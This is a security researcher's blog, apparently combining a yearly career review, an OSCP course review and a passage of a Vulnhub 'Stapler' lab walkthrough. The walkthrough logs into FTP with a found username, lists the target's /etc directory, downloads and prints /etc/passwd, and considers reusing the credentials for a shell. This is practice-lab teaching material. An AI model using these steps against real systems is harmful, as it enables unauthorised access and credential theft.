Next up is an interesting bug that I found while working on one of the private BB programs. They are using PRTG Network Monitor, an application that helps organisations monitor their systems, devices, traffic and applications using common technologies like SNMP, WMI, SSH, and many more. I shall refrain from providing too much information for now; maybe a write-up after the latest version and release notes have been officially released.

* CVE-2017-????? – Paessler AG – pending security patch and release notes
Photo of myself at the Cybersecurity Camp @ Singapore 2017 – Source

Lastly, I attended the Cybersecurity Camp @ Singapore 2017, organised by the Singapore Cybersecurity Consortium (SGCSC) earlier this year, and learnt about fuzz testing for finding vulnerabilities. Having been equipped with this knowledge and its theoretical understanding for a few months, I finally put it into practice after being encouraged by Jin Kun, who shared his own success story of having discovered many zero-day vulnerabilities through fuzzing. Inspired and motivated to do my own fuzzing, I learnt many things along the way: how to fuzz an application efficiently, how to fuzz an application library, how to optimise my virtual machine processes for better performance, how to fine-tune my fuzzer, how different fuzzers mutate input or identify different paths within an application flow, how to compile binaries using different compilers and build systems, how to analyse a crash, and many more interesting things that I never thought I would learn. After some time fuzzing, I discovered 3 CVEs in BinChunker; the issues have been fixed and changes are being pushed to various Linux distros as I am writing this blog post.

* CVE-2017-15953 – BinChunker – Heap-based buffer overflow
* CVE-2017-15954 – BinChunker – Heap-based buffer overflow
* CVE-2017-15955 – BinChunker – Memory Access Violation

There will be a short write-up on this soon. While BinChunker is not a very popular tool based on Debian popularity contest statistics, and there was no RCE exploit developed for the discovered vulnerabilities, it was very satisfying. I really enjoyed the experience, from discovering these vulnerabilities to reporting them and eventually getting them fixed. It's great to see how people react to and appreciate the findings you discover, and then work together to fix the problem as a team. Information Security is a super awesome community where people help one another to make things better!

COMMUNITY PROJECTS
Have you checked out the OWASP Mobile Security Testing Guide (MSTG) already? If you have not, then you probably should. The MSTG is a comprehensive manual for mobile application security testing and reverse engineering. It describes the technical processes for verifying the controls listed in the OWASP Mobile Application Verification Standard (MASVS). You can also read it on Gitbook or download it as an e-book.

Main Deliverables of the OWASP Mobile Security Testing Guide

I was fortunate to work alongside the project leaders of the MSTG at work, and since I knew nothing about mobile application security testing back then, I was highly encouraged by Bernhard to use the MSTG as my "study material": if I found anything missing, I could research it separately and contribute to this community project by submitting a pull request. Well, it makes sense: since I am going to research those things to learn anyway, why not share the knowledge with the community and help fellow aspiring security enthusiasts in their learning as well?

With consistent contribution of quality content for a few months, I am humbled to be acknowledged as one of the "Top Contributors" to the OWASP MSTG project. If you are someone who is interested in mobile application security, I highly encourage you to read through the content and create a pull request if you find anything missing. Once you start submitting those pull requests, they can become quite addictive.
ACADEMIC
This is the last section of the review. Some of my friends know that I am currently a part-time student enrolled in the Master of Computing (Infocomm Security) at the National University of Singapore (NUS). My first semester was hectic, not having studied an academic syllabus since graduating in 2014; however, things went well thanks to the support of family and friends (special shout-out to Zhan Teng, Julian Tan and Jiqing for being super awesome teammates!). The second semester is coming to an end soon and of course, there are tons of submission deadlines to meet in the next few weeks and a few exams to clear!

Android Booting Process

Other things worth mentioning are some of the more interesting homework that I did this semester for one of my modules, CS5231 – System Security, taught by Professor Liang Zhenkai. Usually when I root an Android device, I use readily available tools and do not have a clear understanding of what really happens under the hood. In order to complete one of the tasks in the homework, I was forced to step out of my comfort zone and dive into how Android really works, how rooting of Android is performed and what the various methods to root an Android device are, and eventually I also created my own custom Over-The-Air (OTA) package to perform code execution as root: to fire up my own daemon service that can spawn a root shell to my client upon request.

CONCLUSION / TO-DO FOR THE NEXT YEAR

Without my realising it, this blog post has turned into a long article. Personally, I find it worthwhile and meaningful to just sit down, think through and review what I have done in my past one year in the Information Security industry. I feel that everyone should do something similar and then think about what they want to do in the next one year.

Think about some of the things that you want to achieve in the next one-year
The reason for me to post this article is also to put some pressure on myself and make sure that I achieve the goals which I said I want to achieve in the next one year. Next year, I am going to look back at this article and question myself. In the next one year, I intend to work on other CREST certifications, such as the CREST Certified Infrastructure Tester (CCT INF) and/or CREST Certified Web Applications Tester (CCT APP). As I mentioned above, I like how they conduct proctored examinations here in Singapore, and I find that they can be great milestones to challenge myself with in the next one year. Another certification which I am looking forward to challenging myself with is the Offensive Security Certified Expert (OSCE), whose course, Cracking the Perimeter (CTP), I intend to sign up for in the next few months. I need to try harder! #TryHarder

I got to try harder!

In view of the OSCE certification goal, I hope to focus more on low-level stuff, such as improving my exploitation techniques, exploit development skills, etc., which are things that I don't have much experience with now, but are useful skills which I am very keen to pick up.

In the next one year, I hope to continue to hunt for bugs and keep up with the learning. I also aim to post write-ups on any interesting bugs, if I am given permission to do so. Other things are write-ups on CTF labs such as Bandit from OverTheWire and practice machines such as Kioptrix from Vulnhub.
For work, apart from Web Application and Mobile Application penetration testing, I hope that I can have opportunities to gain more exposure across the Asia region and get myself involved in different types of engagements, such as ATM Hacking, Red Teaming and Wireless Hacking. There are so many things to learn, I can't wait any more! I need to be more productive… I also aim to develop my own Burp Extender module that can help improve my productivity. At least my first extender module should not be too complicated; I just need to get started with something, start small, and gain the knowledge and momentum before targeting something more complicated. If you have any interesting ideas that are not too complicated, please share them in the comments section. Lastly, as part of my Master course requirements, I need to complete a one-semester-long research project (3 months' duration). I can choose between an academic project proposed by one of the NUS professors, or an industrial project proposed by a company in the industry. I have not chosen any topic yet, but I hope that I can work on something useful to my field of work, to not only clear my course requirements, but also allow me to learn practical techniques and knowledge that are relevant to my area of interest. That way, I will have enough interest to continue to work on it after the 3 months are over. If there are any potential projects related to the offensive side of security that are not too complicated/simple, I would love to know about them.

If you have read this entire post, you deserve a medal, just like this camera man
I hope that the next one year will be even better and full of learning opportunities for me! Till I blog again.
MY OSCP / PWK COURSE REVIEW February 23, 2017 (updated November 5, 2017) Wen Bin KONG
General, Resources, Reviews, Tips
certification, certs, exams, oscp
It has been a tough 3 months of virtual lab and hands-on training: so much learning, and I mean intensive learning, combined with many sleepless nights and so much sweat and tears (maybe not the tears part, but you get the point). I have finally passed my OSCP!

I am now officially an Offensive Security Certified Professional! Yes, I tried harder #tryharder

It has been a very tough 3-month journey, which explains why I have not been blogging at all since then. I am happy to be back and blogging once again! Okay, here comes my review of the course, specifically for any fellow aspiring ethical hacker like me, or simply anyone who has a passion for computer security and wants to learn the technical side of the skill set. A little bit about myself (for reference to the content below): I graduated from the National University of Singapore (NUS), School of Computing, Bachelor of E-Commerce, in 2014. Since then, I had been working as an IT Infrastructure Project Delivery Manager at a bank. In my role, I basically coordinated the completion of various deliverables for either the upgrading of existing systems or the setting up of new systems. Up to this point, my job was not security related. To pursue my interest in information security, I left my job. I took up training courses and obtained my EC-Council Certified Ethical Hacker (CEHv9) certification in September 2016. Ever since then, I have been doing a lot of self-learning on IT security, especially hands-on self-training by hacking the Virtual Machines downloadable from Vulnhub; you can read some of my write-ups over here.
Before you sign up for the OSCP course, it is essential to plan your time well! I made a mistake, so I'd like you to learn from it. First, you have to know that to obtain the OSCP certification, you will need to register yourself for the Penetration Testing with Kali (PWK) course. The course consists of a virtual lab environment, the credentials for which will be sent to you (along with the training manual and videos) after you have successfully registered for the course. The mistake I made was to plan for a nice weekend (and a week with less work) to sign up for the course, thinking that I could get started immediately. Listen/read: YOU WILL NOT START THE COURSE IMMEDIATELY. Courses only start on certain days of each week, and each week only a limited number of students can start their PWK course, depending on the sign-up rates, which are not disclosed by Offensive Security. In my case, the earliest I could get started back then was 2 weeks after I signed up for the course. Noticed the mistake here? I totally expected to be able to get started right after I signed up! With the above mistake and poor time management at the start, I spent several days on the PDF lab manual exercises and the training videos. For reference, I started working on the lab machines 2 weeks after my PWK course commenced. Many people would recommend that you jump straight into the lab and not waste any time. I would like to partially disagree. While I believe that you could learn faster by jumping straight into the lab, there are some skill sets which you have to pick up before just jumping in. Personally, I find that you should go through the lab manual chapter on the various methods of file transfer. You should not miss the chapter on buffer overflows either; that is very important, as it teaches you how to craft your own simple fuzzer and shellcode and modify the exploit. The fundamental enumeration techniques are very important too, specifically the chapter on using tools like nmap. Essentially, my point is: DON'T JUST JUMP INTO THE LAB UNLESS YOU KNOW WHAT YOU ARE DOING. Learn the basics, and then jump in to try out the tools. When things are not right, jump out again.
That is the whole point of the lab: for you to practise what you learnt and not just study the theory. Regarding the learning curve, I must say that it really takes time to get your very first shell, and then it gets really addictive. Personally, it took me quite a while to get my first shell, even though it was just simply running the Metasploit tool. Don't know about Metasploit? Fret not, it will be covered in the lab manual. Or you can complete the Metasploit Unleashed Free Ethical Hacking Course, like I did. It was good learning as well, and most importantly, it is an Own Time Own Target (OTOT) kind of free online course. Be patient, the shell will come, you just need to try harder; don't give up. Thanks to the advice and encouragement from my mentor (Paul, that's you), I took up the challenge of hacking PAIN as my 10th machine. For those who don't know what that means: Pain is one of the "boss" machines in the OSCP lab environment, along with its buddies Sufferance, Humble and Gh0st. Hacking Pain as my 10th machine was no easy task. But like I said, I tried harder; it took me 8 days to root it. No joke, 8 days. Along the way, I learnt a lot of stuff I never imagined myself learning and also never expected myself to be able to understand. Of course, no spoilers, but really, just keep Googling and you will find it, trust me, and trust my mentor. Also, thanks to these 8 days of being stuck on a machine, I kind of got used to the suffering (you know the feeling when you have had no shells for a long time) and started to really pick up my pace moving forward. While I am not going to spoon-feed anyone with any post-enumeration scripts, I must say that you can always write your own scripts or make use of available resources; there are several very good scripts around, for you to find out. One piece of advice though: DON'T JUST USE THEM BLINDLY. My peers Jin Kun and Ryan Teoh advised me the same when I was happily using downloaded scripts initially too. There are cases where information is not presented to you directly, or where the operating system is not identical to the script's target. In those cases, what are you going to do? Are you going to modify your script, do it manually, or give up? We never give up, so we have to understand what the script is doing. If you don't understand it, don't use it. Learn. It's the same with Metasploit exploits: you run it, get a shell, yay.
Next, you should try to understand why that worked and try to get the same result without Metasploit. The good thing is that for each Metasploit module you can run the 'info' command to read its description, and you can read the module's source code directly under the "/usr/share/metasploit-framework/modules" directory. As many people will have told you, for privilege escalation the only reference notes you may need are probably just these lists, one for Windows and one for Linux.
Learn and understand them and you are good to go. By the end of my lab time I had made my way all the way into the Administrative department network (as shown in the image above) and hacked some of the machines in there. During my 3 months of lab time, I managed to root 42 of the lab machines. It was not that bad; it is possible, you just have to believe in yourself.

Finally, the exam. For those not familiar with the format, the hands-on exam lasts 23 hours and 45 minutes. There are several machines for you to attack and collect the "flags" from. When your time is up you are cut off from the exam Virtual Private Network (VPN), and you then have to submit a professionally prepared penetration test report within the next 24 hours. The report should document the testing process with step-by-step instructions to reproduce each vulnerability and obtain a shell with the highest system privileges.
I was lucky because several components were very similar to some of the machines I had rooted previously in the lab. While I cannot share what exactly those components were, I believe I can share this: if you keep working on rooting more machines and understand the vulnerabilities you exploited to root them, trust me, you will recognise them when you see them during the exam. Of course, the exam machines will not be that straightforward, but they will most likely be made up of several vulnerabilities (which you have already seen in the lab) chained together, where exploiting one vulnerability leads to the discovery and/or exploitation of the next. Again, time management is super important during the exam: do not get stuck for too long in one spiral. Move on to the next machine and start enumerating for attack vectors. Come back again later. Don't give up. THE ONLY REASON THE MACHINE IS THERE IS BECAUSE IT IS HACKABLE; that is the one fact you should remember during your exam!

To sum up, it was a very fruitful and enriching 3 months of lab time taking the PWK course. If time allows, I would definitely love to take other courses from Offensive Security.

A shout-out: I am very thankful to my friends at Vantage Point Security, who never failed to ask about my progress on the lab machines, listened to my rants and gave me motivational speeches. Special thanks to Paul Craig, Jin Kun and Ryan Teoh, who constantly gave me constructive advice and encouragement that kept me going, not forgetting the many ping pong sessions whenever I had a mental block. Thanks also to my family for supporting me! Lastly, my girlfriend is awesome for being so understanding and considerate during my busy 3-month journey towards the OSCP certification.
Good luck to anyone who wishes to take up the challenge of becoming an Offensive Security Certified Professional (OSCP)!
WRITE-UP FOR KIOPTRIX VIRTUAL MACHINES FROM VULNHUB
November 3, 2016 (updated December 30, 2017), Wen Bin KONG
Categories: CTF, Resources. Tags: CTF, kioptrix, vm, vulnhub, writeup

I have finally completed the write-ups of all 5 Kioptrix Virtual Machines (VMs) from Vulnhub.com; I hope they are helpful to you.

While they are categorised as "beginner" level challenges, I found them pretty challenging and definitely effective training. I learnt many things working on these VMs. For your convenience, here are the 5 write-ups on the Kioptrix machines:

* Writeup for Kioptrix: Level 1 (#1)
* Writeup for Kioptrix: Level 1.1 (#2)
* Writeup for Kioptrix: Level 1.2 (#3)
* Writeup for Kioptrix: Level 1.3 (#4)
* Writeup for Kioptrix: 2014 (#5)

Cheerios!
> 220-
> 220-|-----------------------------------------------------------------------------|
> 220-| Harry, make sure to update the banner when you get a chance to show who has access here |
> 220-|-----------------------------------------------------------------------------|
> 220-
> 220
> Name (192.168.117.136:root): SHayslett
> 331 Please specify the password.
> Password:
> 230 Login successful.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> ls
> 200 PORT command successful. Consider using PASV.
> 150 Here comes the directory listing.
> drwxr-xr-x 5 0 0 4096 Jun 03 2016 X11
> drwxr-xr-x 3 0 0 4096 Jun 03 2016 acpi
> -rw-r--r-- 1 0 0 3028 Apr 20 2016 adduser.conf
> -rw-r--r-- 1 0 0 51 Jun 03 2016 aliases
> -rw-r--r-- 1 0 0 12288 Jun 03 2016 aliases.db
> drwxr-xr-x 2 0 0 4096 Jun 07 2016 alternatives
> drwxr-xr-x 8 0 0 4096 Jun 03 2016 apache2
> drwxr-xr-x 3 0 0 4096 Jun 03 2016 apparmor
> drwxr-xr-x 9 0 0 4096 Jun 06 2016 apparmor.d
> drwxr-xr-x 3 0 0 4096 Jun 03 2016 apport
> drwxr-xr-x 6 0 0 4096 Jun 03 2016 apt
> -rw-r----- 1 0 1 144 Jan 14 2016 at.deny
> drwxr-xr-x 5 0 0 4096 Jun 03 2016 authbind
> -rw-r--r-- 1 0 0 2188 Aug 31 2015 bash.bashrc
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 bash_completion.d
> -rw-r--r-- 1 0 0 367 Jan 27 2016 bindresvport.blacklist
> drwxr-xr-x 2 0 0 4096 Apr 12 2016 binfmt.d
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 byobu
> drwxr-xr-x 3 0 0 4096 Jun 03 2016 ca-certificates
> -rw-r--r-- 1 0 0 7788 Jun 03 2016 ca-certificates.conf
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 console-setup
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.d
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.daily
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.hourly
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.monthly
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.weekly
> -rw-r--r-- 1 0 0 722 Apr 05 2016 crontab
> -rw-r--r-- 1 0 0 54 Jun 03 2016 crypttab
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 dbconfig-common
> drwxr-xr-x 4 0 0 4096 Jun 03 2016 dbus-1
> -rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf
> -rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version
> drwxr-xr-x 3 0 0 4096 Jun 05 2016 default
> -rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 depmod.d
> drwxr-xr-x 4 0 0 4096 Jun 03 2016 dhcp
> -rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 dnsmasq.d
> drwxr-xr-x 4 0 0 4096 Jun 07 2016 dpkg
> -rw-r--r-- 1 0 0 96 Apr 20 2016 environment
> drwxr-xr-x 4 0 0 4096 Jun 03 2016 fonts
> -rw-r--r-- 1 0 0 594 Jun 03 2016 fstab
> -rw-r--r-- 1 0 0 132 Feb 10 2016 ftpusers
> -rw-r--r-- 1 0 0 280 Jun 20 2014 fuse.conf
> -rw-r--r-- 1 0 0 2584 Feb 18 2016 gai.conf
> -rw-rw-r-- 1 0 0 1253 Jun 04 2016 group
> -rw------- 1 0 0 1240 Jun 03 2016 group-
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 grub.d
> -rw-r----- 1 0 42 1004 Jun 04 2016 gshadow
> -rw------- 1 0 0 995 Jun 03 2016 gshadow-
> drwxr-xr-x 3 0 0 4096 Jun 03 2016 gss
> -rw-r--r-- 1 0 0 92 Oct 22 2015 host.conf
> -rw-r--r-- 1 0 0 12 Jun 03 2016 hostname
> -rw-r--r-- 1 0 0 469 Jun 05 2016 hosts
> -rw-r--r-- 1 0 0 411 Jun 03 2016 hosts.allow
> -rw-r--r-- 1 0 0 711 Jun 03 2016 hosts.deny
> -rw-r--r-- 1 0 0 1257 Jun 03 2016 inetd.conf
> drwxr-xr-x 2 0 0 4096 Feb 06 2016 inetd.d
> drwxr-xr-x 2 0 0 4096 Jun 06 2016 init
> drwxr-xr-x 2 0 0 4096 Jun 06 2016 init.d
> drwxr-xr-x 5 0 0 4096 Jun 03 2016 initramfs-tools
> -rw-r--r-- 1 0 0 1748 Feb 04 2016 inputrc
> drwxr-xr-x 3 0 0 4096 Jun 03 2016 insserv
> -rw-r--r-- 1 0 0 771 Mar 06 2015 insserv.conf
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 insserv.conf.d
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 iproute2
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 iptables
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 iscsi
> -rw-r--r-- 1 0 0 345 Dec 17 15:27 issue
> -rw-r--r-- 1 0 0 197 Jun 03 2016 issue.net
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 kbd
> drwxr-xr-x 5 0 0 4096 Jun 03 2016 kernel
> -rw-r--r-- 1 0 0 144 Jun 03 2016 kernel-img.conf
> -rw-r--r-- 1 0 0 26754 Jun 07 2016 ld.so.cache
> -rw-r--r-- 1 0 0 34 Jan 27 2016 ld.so.conf
> drwxr-xr-x 2 0 0 4096 Jun 07 2016 ld.so.conf.d
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 ldap
> -rw-r--r-- 1 0 0 267 Oct 22 2015 legal
> -rw-r--r-- 1 0 0 191 Jan 18 2016 libaudit.conf
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 libnl-3
> drwxr-xr-x 4 0 0 4096 Jun 06 2016 lighttpd
> -rw-r--r-- 1 0 0 2995 Apr 14 2016 locale.alias
> -rw-r--r-- 1 0 0 9149 Jun 03 2016 locale.gen
> -rw-r--r-- 1 0 0 3687 Jun 03 2016 localtime
> drwxr-xr-x 6 0 0 4096 Jun 03 2016 logcheck
> -rw-r--r-- 1 0 0 10551 Mar 29 2016 login.defs
> -rw-r--r-- 1 0 0 703 May 06 2015 logrotate.conf
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 logrotate.d
> -rw-r--r-- 1 0 0 103 Apr 12 2016 lsb-release
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 lvm
> -r--r--r-- 1 0 0 33 Jun 03 2016 machine-id
> -rw-r--r-- 1 0 0 111 Nov 20 2015 magic
> -rw-r--r-- 1 0 0 111 Nov 20 2015 magic.mime
> -rw-r--r-- 1 0 0 2579 Jun 03 2016 mailcap
> -rw-r--r-- 1 0 0 449 Oct 30 2015 mailcap.order
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 mdadm
> -rw-r--r-- 1 0 0 24241 Oct 30 2015 mime.types
> -rw-r--r-- 1 0 0 967 Oct 30 2015 mke2fs.conf
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 modprobe.d
> -rw-r--r-- 1 0 0 195 Apr 20 2016 modules
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 modules-load.d
> lrwxrwxrwx 1 0 0 19 Jun 03 2016 mtab -> ../proc/self/mounts
> drwxr-xr-x 4 0 0 4096 Jun 06 2016 mysql
> drwxr-xr-x 7 0 0 4096 Jun 03 2016 network
> -rw-r--r-- 1 0 0 91 Oct 22 2015 networks
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 newt
> -rw-r--r-- 1 0 0 497 May 04 2014 nsswitch.conf
> drwxr-xr-x 2 0 0 4096 Apr 20 2016 opt
> lrwxrwxrwx 1 0 0 21 Jun 03 2016 os-release -> ../usr/lib/os-release
> -rw-r--r-- 1 0 0 6595 Jun 23 2015 overlayroot.conf
> -rw-r--r-- 1 0 0 552 Mar 16 2016 pam.conf
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 pam.d
> -rw-r--r-- 1 0 0 2908 Jun 04 2016 passwd
> -rw------- 1 0 0 2869 Jun 03 2016 passwd-
> drwxr-xr-x 4 0 0 4096 Jun 03 2016 perl
> drwxr-xr-x 3 0 0 4096 Jun 03 2016 php
> drwxr-xr-x 3 0 0 4096 Jun 06 2016 phpmyadmin
> drwxr-xr-x 3 0 0 4096 Jun 03 2016 pm
> drwxr-xr-x 5 0 0 4096 Jun 03 2016 polkit-1
> drwxr-xr-x 3 0 0 4096 Jun 03 2016 postfix
> drwxr-xr-x 4 0 0 4096 Jun 03 2016 ppp
> -rw-r--r-- 1 0 0 575 Oct 22 2015 profile
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 profile.d
> -rw-r--r-- 1 0 0 2932 Oct 25 2014 protocols
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 python
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 python2.7
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 python3
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 python3.5
> -rwxr-xr-x 1 0 0 472 Jun 06 2016 rc.local
> drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc0.d
> drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc1.d
> drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc2.d
> drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc3.d
> drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc4.d
> drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc5.d
> drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc6.d
> drwxr-xr-x 2 0 0 4096 Jun 06 2016 rcS.d
> -rw-r--r-- 1 0 0 63 Dec 17 17:34 resolv.conf
> drwxr-xr-x 5 0 0 4096 Jun 06 2016 resolvconf
> -rwxr-xr-x 1 0 0 268 Nov 10 2015 rmt
> -rw-r--r-- 1 0 0 887 Oct 25 2014 rpc
> -rw-r--r-- 1 0 0 1371 Jan 27 2016 rsyslog.conf
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 rsyslog.d
> drwxr-xr-x 3 0 0 4096 Dec 17 15:27 samba
> -rw-r--r-- 1 0 0 3663 Jun 09 2015 screenrc
> -rw-r--r-- 1 0 0 4038 Mar 29 2016 securetty
> drwxr-xr-x 4 0 0 4096 Jun 03 2016 security
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 selinux
> -rw-r--r-- 1 0 0 19605 Oct 25 2014 services
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 sgml
> -rw-r----- 1 0 42 4518 Jun 05 2016 shadow
> -rw------- 1 0 0 1873 Jun 03 2016 shadow-
> -rw-r--r-- 1 0 0 125 Jun 03 2016 shells
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 skel
> -rw-r--r-- 1 0 0 100 Nov 25 2015 sos.conf
> drwxr-xr-x 2 0 0 4096 Jun 04 2016 ssh
> drwxr-xr-x 4 0 0 4096 Jun 03 2016 ssl
> -rw-r--r-- 1 0 0 644 Jun 04 2016 subgid
> -rw------- 1 0 0 625 Jun 03 2016 subgid-
> -rw-r--r-- 1 0 0 644 Jun 04 2016 subuid
> -rw------- 1 0 0 625 Jun 03 2016 subuid-
> -r--r----- 1 0 0 769 Jun 05 2016 sudoers
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 sudoers.d
> -rw-r--r-- 1 0 0 2227 Jun 03 2016 sysctl.conf
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 sysctl.d
> drwxr-xr-x 5 0 0 4096 Jun 03 2016 systemd
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 terminfo
> -rw-r--r-- 1 0 0 14 Jun 03 2016 timezone
> drwxr-xr-x 2 0 0 4096 Apr 12 2016 tmpfiles.d
> -rw-r--r-- 1 0 0 1260 Mar 16 2016 ucf.conf
> drwxr-xr-x 4 0 0 4096 Jun 03 2016 udev
> drwxr-xr-x 3 0 0 4096 Jun 03 2016 ufw
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 update-motd.d
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 update-notifier
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 vim
> drwxr-xr-x 3 0 0 4096 Jun 03 2016 vmware-tools
> -rw-r--r-- 1 0 0 278 Jun 03 2016 vsftpd.banner
> -rw-r--r-- 1 0 0 0 Jun 03 2016 vsftpd.chroot_list
> -rw-r--r-- 1 0 0 5961 Jun 04 2016 vsftpd.conf
> -rw-r--r-- 1 0 0 0 Jun 03 2016 vsftpd.user_list
> lrwxrwxrwx 1 0 0 23 Jun 03 2016 vtrgb -> /etc/alternatives/vtrgb
> -rw-r--r-- 1 0 0 4942 Jan 08 2016 wgetrc
> drwxr-xr-x 3 0 0 4096 Jun 03 2016 xdg
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 xml
> drwxr-xr-x 2 0 0 4096 Jun 03 2016 zsh
> 226 Directory send OK.

This is really bad. The FTP login drops us straight into the target's /etc, and every file you see above (those readable by the FTP user, at least) can be downloaded now. For example, the passwd file:

> ftp> get passwd

And if you view the file, you get the following content:

> root@kali:/tmp/stapler1# cat passwd
> root:x:0:0:root:/root:/bin/zsh
> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
> bin:x:2:2:bin:/bin:/usr/sbin/nologin
> sys:x:3:3:sys:/dev:/usr/sbin/nologin
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/usr/sbin/nologin
> man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
> lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
> mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
> news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
> uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
> proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
> www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
> backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
> list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
> irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
> gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
> systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
> systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
> systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
> systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
> syslog:x:104:108::/home/syslog:/bin/false
> _apt:x:105:65534::/nonexistent:/bin/false
> lxd:x:106:65534::/var/lib/lxd/:/bin/false
> dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
> messagebus:x:108:111::/var/run/dbus:/bin/false
> sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
> peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
> mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
> RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
> ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
> DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
> AParnell:x:1004:1004::/home/AParnell:/bin/bash
> SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
> MBassin:x:1006:1006::/home/MBassin:/bin/bash
> JBare:x:1007:1007::/home/JBare:/bin/bash
> LSolum:x:1008:1008::/home/LSolum:/bin/bash
> IChadwick:x:1009:1009::/home/IChadwick:/bin/false
> MFrei:x:1010:1010::/home/MFrei:/bin/bash
> SStroud:x:1011:1011::/home/SStroud:/bin/bash
> CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
> JKanode:x:1013:1013::/home/JKanode:/bin/bash
> CJoo:x:1014:1014::/home/CJoo:/bin/bash
> Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
> LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
> JLipps:x:1017:1017::/home/JLipps:/bin/sh
> jamie:x:1018:1018::/home/jamie:/bin/sh
> Sam:x:1019:1019::/home/Sam:/bin/zsh
> Drew:x:1020:1020::/home/Drew:/bin/bash
> jess:x:1021:1021::/home/jess:/bin/bash
> SHAY:x:1022:1022::/home/SHAY:/bin/bash
> Taylor:x:1023:1023::/home/Taylor:/bin/sh
> mel:x:1024:1024::/home/mel:/bin/bash
> kai:x:1025:1025::/home/kai:/bin/sh
> zoe:x:1026:1026::/home/zoe:/bin/bash
> NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
> www:x:1028:1028::/home/www:
> postfix:x:112:118::/var/spool/postfix:/bin/false
> ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
> elly:x:1029:1029::/home/elly:/bin/bash

This is really bad. Note that the account we just logged in with, SHayslett, has /bin/bash as its login shell, so it is not an FTP-only account. Can I get an interactive shell using these same credentials?
